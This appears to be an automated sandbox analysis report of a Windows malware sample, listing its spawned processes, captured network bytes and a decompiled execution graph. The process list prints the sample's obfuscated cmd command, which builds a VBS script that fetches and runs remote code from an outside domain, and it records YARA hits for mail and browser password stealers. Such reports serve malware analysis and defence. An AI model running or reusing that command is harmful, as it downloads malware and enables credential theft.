71 23 ed 5e 1c 91 6e 07 e5 3a b7 80 2d 3e 43 c7 5f 99 76 cc 40 12 07 20 cf 02 da 19 7f 16 cf 02 51 2c b2 7e 13 07 00 77 8c b2 ad 5c d5 9b 72 e2 0e e3 3d 09 f0 c8 bf 63 35 27 53 0f 0b ce c9 80 76 b9 34
                                                                                                    Data Ascii: W9kc\@`pv%&%=N{6z\YAD`<5<M0K,>0%kQ"0;ozlKu IxBi|EyN,qnQ]}x&d.d{nV|t(ZThK.a[:b ({&q#^n:->C_v@ Q,~w\r=c5'Sv4
                                                                                                    2023-10-24 04:55:36 UTC4987INData Raw: 41 81 40 3a 94 18 c0 da 10 a6 eb 73 e0 6e 55 0c e8 77 70 e4 61 71 22 a9 aa ab fc b3 51 a6 1d 21 39 f1 c0 10 ff 30 fc 35 dd e8 50 b9 ea 8c 1f 21 e7 c0 20 1c 66 65 8b 74 c0 69 46 f3 80 f3 95 b9 6e 58 69 60 69 0a 41 19 e4 e7 2c 06 3d 34 55 08 a9 3c 86 ba 0e a6 1b 19 19 21 a2 39 e5 d1 ee 21 85 a3 32 85 5d 08 9f b4 b2 b3 b4 13 68 50 cf 6a 60 cc 2d e5 da 5c e4 5e 59 03 79 17 0f d2 c2 be 67 29 81 78 bd f1 c2 05 31 c6 c9 be 0f d5 d9 92 fb 26 81 4a 0d ae 9c fb 35 db 89 bf 6c b7 78 42 f1 77 43 c1 f2 26 9f d8 68 3e 43 8d 7d b1 68 f6 b3 05 25 24 ac 5e 78 35 cf 05 1a 63 fa b0 7f b3 f1 16 ea 57 7d 92 97 be 5c 78 16 b7 d0 61 8a 68 17 c6 70 b9 a4 65 05 e1 ea 8f 8f 23 92 61 a4 99 b4 58 c0 f2 30 7b b0 fd 93 6a 20 a1 35 13 b6 c5 2d ca 0e 00 df f9 7f 51 14 3f 61 eb 06 1f 32
                                                                                                    Data Ascii: A@:snUwpaq"Q!905P! fetiFnXi`iA,=4U<!9!2]hPj`-\^Yyg)x1&J5lxBwC&h>C}h%$^x5cW}\xahpe#aX0{j 5-Q?a2
                                                                                                    2023-10-24 04:55:36 UTC4994INData Raw: f7 81 d5 14 fc af 3d ec b2 28 f1 3b d9 dd 0e 05 da 34 1f c6 2d 59 bf 7a 9a c3 bb 72 0a 97 68 2a 88 00 96 db 32 19 ba 0d 5e 87 3d 3a c0 67 c1 a9 08 f3 a5 ab 48 a2 f2 63 a3 4b 14 ac 73 dd 77 8f 5d 3f f9 46 a9 5c 19 60 65 1a 35 69 fe b5 9c dd ff 20 fb 63 44 51 c7 27 96 fc 54 0a 58 34 96 c1 c2 7e 98 36 46 47 39 79 51 4d 53 f0 b9 19 45 c6 3b 7c b9 e6 3d e2 bc a6 a7 a0 d4 7c d0 1f 3f 9c 44 ff e0 d6 b0 0d 29 05 bf a4 1a 38 c0 8d 3d 85 40 de 79 e4 18 7a 63 74 65 ea c8 a3 22 cc 63 f8 be a8 d4 1e f0 cc f4 8b 50 3d 1f 46 82 c3 e4 71 6f 82 7a d8 ac 46 45 78 50 50 53 fc 7e 19 3d 27 3c 58 bc 67 3c aa bc 78 8d 51 38 2f 49 71 1f 36 f1 a6 1a 54 26 aa 20 64 9d 50 b9 bb c1 3d dc 22 ca 56 64 cb d4 f9 91 c3 21 c2 d3 1a e6 f5 30 c5 73 a9 53 54 2f db 84 60 f5 83 32 d0 07 e3 01
                                                                                                    Data Ascii: =(;4-Yzrh*2^=:gHcKsw]?F\`e5i cDQ'TX4~6FG9yQMSE;|=|?D)8=@yzcte"cP=FqozFExPPS~='<Xg<xQ8/Iq6T& dP="Vd!0sST/`2
                                                                                                    2023-10-24 04:55:36 UTC5002INData Raw: eb 71 99 5a 70 d0 cc db 09 c2 de ec 55 78 c6 79 93 44 54 c2 6a ec d0 41 f4 34 9b c4 4a 14 37 95 0d 66 41 4a 84 ad 84 59 32 ca 06 02 5d f9 0a 36 9f a1 37 89 6c 3a 8c 93 b6 4c 95 a1 f9 78 a0 9e 0f 8a 64 73 c8 b9 04 23 a1 cf 7e 26 a8 2d 76 3a c3 c3 e0 66 e8 03 c5 71 bb e5 49 75 21 69 48 25 6c 51 a5 6b ef 86 4c 1c c4 ca 06 8b 3b c2 de cc e2 15 03 5e f0 25 a3 f8 5c be b3 52 c1 b6 d6 1a 43 a9 fb e7 f2 e7 3b 34 d8 50 2d d1 0b 92 af f2 89 c2 ee d4 91 48 bd 92 46 c0 15 84 4f 41 a8 32 d5 46 8a 05 23 6b 58 1c 64 49 e3 95 a1 cf 40 16 b6 25 71 3a 23 6a 3d 26 cc 38 53 e8 ce 9a 3d 85 8f 11 89 9d b7 07 e7 da 4e ec 92 8b f1 69 1c c1 dc f6 72 50 7b 0c 00 04 5f 1f 21 a7 de 86 06 f9 0b 3f 05 56 d4 23 1a 32 be 3a 0c 4f 3d 85 59 63 58 98 64 ed d5 9f 56 14 05 7f 7d e5 f9 94 54
                                                                                                    Data Ascii: qZpUxyDTjA4J7fAJY2]67l:Lxds#~&-v:fqIu!iH%lQkL;^%\RC;4P-HFOA2F#kXdI@%q:#j=&8S=NirP{_!?V#2:O=YcXdV}T
                                                                                                    2023-10-24 04:55:36 UTC5010INData Raw: 4d b3 d6 fb 06 80 d6 33 20 bb a2 b4 9a 85 93 c7 e2 14 2b 4e f6 6a f7 59 7e 44 e7 11 dc db 07 8e c2 5a e0 0b 73 a2 94 81 a3 2e c2 bc c0 60 e7 2e 77 99 0b 7e a3 a1 0d 2f 27 e1 56 a1 8a ee 48 86 17 b2 73 d7 78 01 9c d2 18 fe 1a b4 64 7c 76 b4 45 2d 29 08 52 c8 df 7a d8 1d 08 5f 24 f1 34 d9 c1 79 ac 66 97 4b e5 b2 62 f6 ef 52 95 f0 75 a8 59 95 18 b0 9a 5e e5 d5 73 80 6e 87 a0 57 be 8a 91 58 62 7a c9 26 64 7e 9d af e9 5a 77 be 64 8c 79 26 a8 83 e2 eb b1 e4 f3 7d cc c6 2b af 41 5c 21 83 9c f5 c4 b4 a4 29 7d f5 c5 b0 c8 fb 45 3d 20 97 ff 35 f2 fc 78 81 cf 3b 2c ff 35 57 bb 52 00 54 3b 07 be 9c 48 a3 bb ab 02 4e b7 98 b4 15 3e 8b 8a 5e 50 2e ca 48 66 ab cd b4 67 c9 7b e5 42 60 3e d3 08 79 94 4f 44 f0 c2 4a 49 73 3d d2 9d c3 a8 22 9a b4 b8 3e 64 9a 40 3b 87 53 a4
                                                                                                    Data Ascii: M3 +NjY~DZs.`.w~/'VHsxd|vE-)Rz_$4yfKbRuY^snWXbz&d~Zwdy&}+A\!)}E= 5x;,5WRT;HN>^P.Hfg{B`>yODJIs=">d@;S
                                                                                                    2023-10-24 04:55:36 UTC5018INData Raw: b0 d4 fb dc a9 fe 4c e4 da 74 7e fd 13 5e 14 19 95 8f e1 a9 ad 96 d0 93 63 2c 64 7a e8 a7 30 39 05 e2 84 32 1c 70 ab b6 75 0d bd 92 df 9c 77 ea 77 60 b2 18 d5 c0 94 75 ff d1 a4 ac 5c da eb a7 d7 62 ec d7 bd 02 a8 e6 63 b3 5d 15 2e 56 27 a8 29 2a 0e 9e 1e 91 19 f2 fb 97 e4 f2 97 71 cd 5f bb 91 f7 20 6e 37 ea e8 52 bb 28 c2 97 5e 5c f4 75 48 ac 2e fc a6 10 79 67 b4 cd a1 d3 1b c9 fc 4d c9 c0 e1 e2 d3 59 12 d3 52 1a 6b 45 22 a9 6d e7 c9 39 7b 31 98 28 3d 37 81 c1 00 ed 2d 30 c9 87 c7 77 8f 94 56 66 8d 62 60 3e 59 17 e8 6c 8a 41 30 68 70 4b 15 88 b6 e8 d3 ae f1 8f b5 29 c9 db 04 e6 0f 5c 72 39 27 ea 83 e3 fc 8a 3c e6 44 9f 1d b7 b9 dc e1 21 b6 53 49 55 69 3c 70 62 66 f3 35 2b f8 99 5b 70 65 4a 81 37 0a d6 74 f2 8c 7e 7f 5d 76 da 8a e1 96 b0 26 59 75 7e 37 7b
                                                                                                    Data Ascii: Lt~^c,dz092puww`u\bc].V')*q_ n7R(^\uH.ygMYRkE"m9{1(=7-0wVfb`>YlA0hpK)\r9'<D!SIUi<pbf5+[peJ7t~]v&Yu~7{


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:06:55:15
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Users\user\Desktop\dGuYmJNS1K.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\dGuYmJNS1K.exe
                                                                                                    Imagebase:0xfe0000
                                                                                                    File size:1'049'600 bytes
                                                                                                    MD5 hash:897AF5616BFD6AF5B687876924F39EE3
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:06:55:15
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
                                                                                                    Imagebase:0x240000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:06:55:15
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:06:55:15
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                    Imagebase:0x240000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:06:55:15
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
                                                                                                    Imagebase:0x240000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:06:55:16
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                    Imagebase:0x240000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:06:55:16
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
                                                                                                    Imagebase:0x240000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:06:55:16
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c start C:\Users\Public\bjk6l9.vbs
                                                                                                    Imagebase:0x240000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:06:55:16
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
                                                                                                    Imagebase:0x3f0000
                                                                                                    File size:147'456 bytes
                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:06:55:38
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\wql455oi0\ef2dsio342ai.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\wql455oi0\ef2dsio342ai.exe" ef2dsio342
                                                                                                    Imagebase:0xd10000
                                                                                                    File size:947'288 bytes
                                                                                                    MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:06:55:39
                                                                                                    Start date:24/10/2023
                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:c:/windows/SysWOW64/attrib.exe
                                                                                                    Imagebase:0xd00000
                                                                                                    File size:19'456 bytes
                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:false

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:5.6%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:1.5%
                                                                                                      Total number of Nodes:1585
                                                                                                      Total number of Limit Nodes:34
                                                                                                      execution_graph 7748 fe48ff 7761 fe82c8 GetEnvironmentStringsW 7748->7761 7750 fe4910 7751 fe4916 7750->7751 7752 fe4922 7750->7752 7768 fe5d4b 7751->7768 7774 fe4a35 7752->7774 7757 fe5d4b __freea 14 API calls 7758 fe4946 7757->7758 7759 fe5d4b __freea 14 API calls 7758->7759 7760 fe494c 7759->7760 7762 fe82d9 7761->7762 7763 fe82d7 7761->7763 7796 fe8e93 7762->7796 7763->7750 7765 fe82ee __InternalCxxFrameHandler 7766 fe5d4b __freea 14 API calls 7765->7766 7767 fe8308 FreeEnvironmentStringsW 7766->7767 7767->7750 7769 fe5d56 HeapFree 7768->7769 7770 fe491c 7768->7770 7769->7770 7771 fe5d6b GetLastError 7769->7771 7772 fe5d78 __dosmaperr 7771->7772 7773 fe5d38 __dosmaperr 12 API calls 7772->7773 7773->7770 7775 fe4a54 7774->7775 7776 fe728b _unexpected 14 API calls 7775->7776 7777 fe4a94 7776->7777 7778 fe4a9c 7777->7778 7787 fe4aa6 7777->7787 7779 fe5d4b __freea 14 API calls 7778->7779 7795 fe4929 7779->7795 7780 fe4b1b 7781 fe5d4b __freea 14 API calls 7780->7781 7781->7795 7782 fe728b _unexpected 14 API calls 7782->7787 7783 fe4b2b 8026 fe4b53 7783->8026 7787->7780 7787->7782 7787->7783 7789 fe4b46 7787->7789 7792 fe5d4b __freea 14 API calls 7787->7792 8017 fe714e 7787->8017 7788 fe5d4b __freea 14 API calls 7790 fe4b39 7788->7790 8032 fe5c67 IsProcessorFeaturePresent 7789->8032 7793 fe5d4b __freea 14 API calls 7790->7793 7792->7787 7793->7795 7794 fe4b52 7795->7757 7797 fe8ed1 7796->7797 7802 fe8ea1 _unexpected 7796->7802 7806 fe5d38 7797->7806 7799 fe8ebc RtlAllocateHeap 7800 fe8ecf 7799->7800 7799->7802 7800->7765 7802->7797 7802->7799 7803 fe99b0 7802->7803 7809 fe99dc 7803->7809 7820 fe6fb4 GetLastError 7806->7820 7808 fe5d3d 7808->7800 7810 fe99e8 ___scrt_is_nonwritable_in_current_image 7809->7810 7815 fe86e1 EnterCriticalSection 7810->7815 7812 fe99f3 __FrameHandler3::FrameUnwindToState 7816 fe9a2a 7812->7816 7815->7812 7819 fe8729 LeaveCriticalSection 7816->7819 7818 fe99bb 7818->7802 7819->7818 7821 fe6fca 7820->7821 7822 fe6fd0 7820->7822 7843 fe96dc 7821->7843 7826 fe6fd4 SetLastError 7822->7826 7848 fe971b 7822->7848 7826->7808 7830 fe701a 7832 fe971b _unexpected 6 API calls 7830->7832 7831 fe7009 7833 fe971b _unexpected 6 API calls 7831->7833 7834 fe7026 7832->7834 7835 fe7017 7833->7835 7836 fe702a 7834->7836 7837 fe7041 7834->7837 7839 fe5d4b __freea 12 API calls 7835->7839 7838 fe971b _unexpected 6 API calls 7836->7838 7860 fe6c91 7837->7860 7838->7835 7839->7826 7842 fe5d4b __freea 12 API calls 7842->7826 7865 fe951d 7843->7865 7845 fe96f8 7846 fe9713 TlsGetValue 7845->7846 7847 fe9701 7845->7847 7847->7822 7849 fe951d _unexpected 5 API calls 7848->7849 7850 fe9737 7849->7850 7851 fe9755 TlsSetValue 7850->7851 7852 fe6fec 7850->7852 7852->7826 7853 fe728b 7852->7853 7856 fe7298 _unexpected 7853->7856 7854 fe72d8 7858 fe5d38 __dosmaperr 13 API calls 7854->7858 7855 fe72c3 RtlAllocateHeap 7855->7856 7857 fe7001 7855->7857 7856->7854 7856->7855 7859 fe99b0 _unexpected 2 API calls 7856->7859 7857->7830 7857->7831 7858->7857 7859->7856 7879 fe6b25 7860->7879 7866 fe954d 7865->7866 7870 fe9549 _unexpected 7865->7870 7866->7870 7871 fe9452 7866->7871 7869 fe9567 GetProcAddress 7869->7870 7870->7845 7877 fe9463 7871->7877 7872 fe94f9 7872->7869 7872->7870 7873 fe9481 LoadLibraryExW 7874 fe949c GetLastError 7873->7874 7875 fe9500 7873->7875 7874->7877 7875->7872 7876 fe9512 FreeLibrary 7875->7876 7876->7872 7877->7872 7877->7873 7878 fe94cf LoadLibraryExW 7877->7878 7878->7875 7878->7877 7880 fe6b31 ___scrt_is_nonwritable_in_current_image 7879->7880 7893 fe86e1 EnterCriticalSection 7880->7893 7882 fe6b3b 7894 fe6b6b 7882->7894 7885 fe6c37 7886 fe6c43 ___scrt_is_nonwritable_in_current_image 7885->7886 7898 fe86e1 EnterCriticalSection 7886->7898 7888 fe6c4d 7899 fe6e18 7888->7899 7890 fe6c65 7903 fe6c85 7890->7903 7893->7882 7897 fe8729 LeaveCriticalSection 7894->7897 7896 fe6b59 7896->7885 7897->7896 7898->7888 7900 fe6e4e _unexpected 7899->7900 7901 fe6e27 _unexpected 7899->7901 7900->7890 7901->7900 7906 fe90cd 7901->7906 8016 fe8729 LeaveCriticalSection 7903->8016 7905 fe6c73 7905->7842 7907 fe914d 7906->7907 7910 fe90e3 7906->7910 7909 fe5d4b __freea 14 API calls 7907->7909 7932 fe919b 7907->7932 7911 fe916f 7909->7911 7910->7907 7914 fe9116 7910->7914 7916 fe5d4b __freea 14 API calls 7910->7916 7912 fe5d4b __freea 14 API calls 7911->7912 7913 fe9182 7912->7913 7917 fe5d4b __freea 14 API calls 7913->7917 7918 fe5d4b __freea 14 API calls 7914->7918 7933 fe9138 7914->7933 7915 fe5d4b __freea 14 API calls 7919 fe9142 7915->7919 7921 fe910b 7916->7921 7923 fe9190 7917->7923 7924 fe912d 7918->7924 7925 fe5d4b __freea 14 API calls 7919->7925 7920 fe9209 7926 fe5d4b __freea 14 API calls 7920->7926 7934 fe8c23 7921->7934 7928 fe5d4b __freea 14 API calls 7923->7928 7962 fe8d21 7924->7962 7925->7907 7931 fe920f 7926->7931 7927 fe91a9 7927->7920 7930 fe5d4b 14 API calls __freea 7927->7930 7928->7932 7930->7927 7931->7900 7974 fe923e 7932->7974 7933->7915 7935 fe8c34 7934->7935 7961 fe8d1d 7934->7961 7936 fe8c45 7935->7936 7937 fe5d4b __freea 14 API calls 7935->7937 7938 fe8c57 7936->7938 7939 fe5d4b __freea 14 API calls 7936->7939 7937->7936 7940 fe8c69 7938->7940 7941 fe5d4b __freea 14 API calls 7938->7941 7939->7938 7942 fe8c7b 7940->7942 7943 fe5d4b __freea 14 API calls 7940->7943 7941->7940 7944 fe8c8d 7942->7944 7945 fe5d4b __freea 14 API calls 7942->7945 7943->7942 7946 fe8c9f 7944->7946 7947 fe5d4b __freea 14 API calls 7944->7947 7945->7944 7948 fe8cb1 7946->7948 7949 fe5d4b __freea 14 API calls 7946->7949 7947->7946 7950 fe8cc3 7948->7950 7951 fe5d4b __freea 14 API calls 7948->7951 7949->7948 7952 fe8cd5 7950->7952 7953 fe5d4b __freea 14 API calls 7950->7953 7951->7950 7954 fe5d4b __freea 14 API calls 7952->7954 7956 fe8ce7 7952->7956 7953->7952 7954->7956 7955 fe8cf9 7958 fe8d0b 7955->7958 7959 fe5d4b __freea 14 API calls 7955->7959 7956->7955 7957 fe5d4b __freea 14 API calls 7956->7957 7957->7955 7960 fe5d4b __freea 14 API calls 7958->7960 7958->7961 7959->7958 7960->7961 7961->7914 7963 fe8d2e 7962->7963 7973 fe8d86 7962->7973 7964 fe8d3e 7963->7964 7965 fe5d4b __freea 14 API calls 7963->7965 7966 fe5d4b __freea 14 API calls 7964->7966 7968 fe8d50 7964->7968 7965->7964 7966->7968 7967 fe8d74 7972 fe5d4b __freea 14 API calls 7967->7972 7967->7973 7969 fe5d4b __freea 14 API calls 7968->7969 7971 fe8d62 7968->7971 7969->7971 7970 fe5d4b __freea 14 API calls 7970->7967 7971->7967 7971->7970 7972->7973 7973->7933 7975 fe924b 7974->7975 7979 fe926a 7974->7979 7975->7979 7980 fe8daf 7975->7980 7978 fe5d4b __freea 14 API calls 7978->7979 7979->7927 7981 fe8e8d 7980->7981 7982 fe8dc0 7980->7982 7981->7978 7983 fe8d8a _unexpected 14 API calls 7982->7983 7984 fe8dc8 7983->7984 7985 fe8d8a _unexpected 14 API calls 7984->7985 7986 fe8dd3 7985->7986 7987 fe8d8a _unexpected 14 API calls 7986->7987 7988 fe8dde 7987->7988 7989 fe8d8a _unexpected 14 API calls 7988->7989 7990 fe8de9 7989->7990 7991 fe8d8a _unexpected 14 API calls 7990->7991 7992 fe8df7 7991->7992 7993 fe5d4b __freea 14 API calls 7992->7993 7994 fe8e02 7993->7994 7995 fe5d4b __freea 14 API calls 7994->7995 7996 fe8e0d 7995->7996 7997 fe5d4b __freea 14 API calls 7996->7997 7998 fe8e18 7997->7998 7999 fe8d8a _unexpected 14 API calls 7998->7999 8000 fe8e26 7999->8000 8001 fe8d8a _unexpected 14 API calls 8000->8001 8002 fe8e34 8001->8002 8003 fe8d8a _unexpected 14 API calls 8002->8003 8004 fe8e45 8003->8004 8005 fe8d8a _unexpected 14 API calls 8004->8005 8006 fe8e53 8005->8006 8007 fe8d8a _unexpected 14 API calls 8006->8007 8008 fe8e61 8007->8008 8009 fe5d4b __freea 14 API calls 8008->8009 8010 fe8e6c 8009->8010 8011 fe5d4b __freea 14 API calls 8010->8011 8012 fe8e77 8011->8012 8013 fe5d4b __freea 14 API calls 8012->8013 8014 fe8e82 8013->8014 8015 fe5d4b __freea 14 API calls 8014->8015 8015->7981 8016->7905 8018 fe716a 8017->8018 8019 fe715c 8017->8019 8020 fe5d38 __dosmaperr 14 API calls 8018->8020 8019->8018 8024 fe7184 8019->8024 8021 fe7174 8020->8021 8036 fe5c57 8021->8036 8023 fe717e 8023->7787 8024->8023 8025 fe5d38 __dosmaperr 14 API calls 8024->8025 8025->8021 8027 fe4b60 8026->8027 8031 fe4b31 8026->8031 8028 fe4b77 8027->8028 8029 fe5d4b __freea 14 API calls 8027->8029 8030 fe5d4b __freea 14 API calls 8028->8030 8029->8027 8030->8031 8031->7788 8033 fe5c73 8032->8033 8083 fe5a5b 8033->8083 8039 fe5ba3 8036->8039 8038 fe5c63 8038->8023 8040 fe5bb5 __FrameHandler3::FrameUnwindToState 8039->8040 8043 fe5bda 8040->8043 8042 fe5bcd __FrameHandler3::FrameUnwindToState 8042->8038 8044 fe5bea 8043->8044 8045 fe5bf1 8043->8045 8054 fe5870 GetLastError 8044->8054 8050 fe5bff 8045->8050 8058 fe5a32 8045->8058 8048 fe5c26 8049 fe5c67 ___std_exception_copy 11 API calls 8048->8049 8048->8050 8051 fe5c56 8049->8051 8050->8042 8052 fe5ba3 ___std_exception_copy 29 API calls 8051->8052 8053 fe5c63 8052->8053 8053->8042 8055 fe5889 8054->8055 8061 fe7065 8055->8061 8059 fe5a3d GetLastError SetLastError 8058->8059 8060 fe5a56 8058->8060 8059->8048 8060->8048 8062 fe7078 8061->8062 8063 fe707e 8061->8063 8064 fe96dc _unexpected 6 API calls 8062->8064 8065 fe971b _unexpected 6 API calls 8063->8065 8067 fe58a5 SetLastError 8063->8067 8064->8063 8066 fe7098 8065->8066 8066->8067 8068 fe728b _unexpected 14 API calls 8066->8068 8067->8045 8069 fe70a8 8068->8069 8070 fe70c5 8069->8070 8071 fe70b0 8069->8071 8073 fe971b _unexpected 6 API calls 8070->8073 8072 fe971b _unexpected 6 API calls 8071->8072 8074 fe70bc 8072->8074 8075 fe70d1 8073->8075 8078 fe5d4b __freea 14 API calls 8074->8078 8076 fe70e4 8075->8076 8077 fe70d5 8075->8077 8080 fe6c91 _unexpected 14 API calls 8076->8080 8079 fe971b _unexpected 6 API calls 8077->8079 8078->8067 8079->8074 8081 fe70ef 8080->8081 8082 fe5d4b __freea 14 API calls 8081->8082 8082->8067 8084 fe5a77 __FrameHandler3::FrameUnwindToState 8083->8084 8085 fe5aa3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8084->8085 8086 fe5b74 __FrameHandler3::FrameUnwindToState 8085->8086 8089 fe13a9 8086->8089 8088 fe5b92 GetCurrentProcess TerminateProcess 8088->7794 8090 fe13b2 IsProcessorFeaturePresent 8089->8090 8091 fe13b1 8089->8091 8093 fe163f 8090->8093 8091->8088 8096 fe1602 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8093->8096 8095 fe1722 8095->8088 8096->8095 9174 fe98ff 9175 fe9918 9174->9175 9176 fe9936 9174->9176 9175->9176 9177 fe8b97 34 API calls 9175->9177 9177->9175 8097 fe147c 8098 fe1488 ___scrt_is_nonwritable_in_current_image 8097->8098 8123 fe179a 8098->8123 8100 fe148f 8101 fe15e2 8100->8101 8112 fe14b9 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 8100->8112 8171 fe1a8e IsProcessorFeaturePresent 8101->8171 8103 fe15e9 8150 fe5055 8103->8150 8108 fe14d8 8109 fe1559 8134 fe1ba9 8109->8134 8111 fe155f 8138 fe1000 7 API calls 8111->8138 8112->8108 8112->8109 8153 fe502f 8112->8153 8115 fe1574 8160 fe1bdf GetModuleHandleW 8115->8160 8118 fe157f 8119 fe1588 8118->8119 8162 fe500a 8118->8162 8165 fe190b 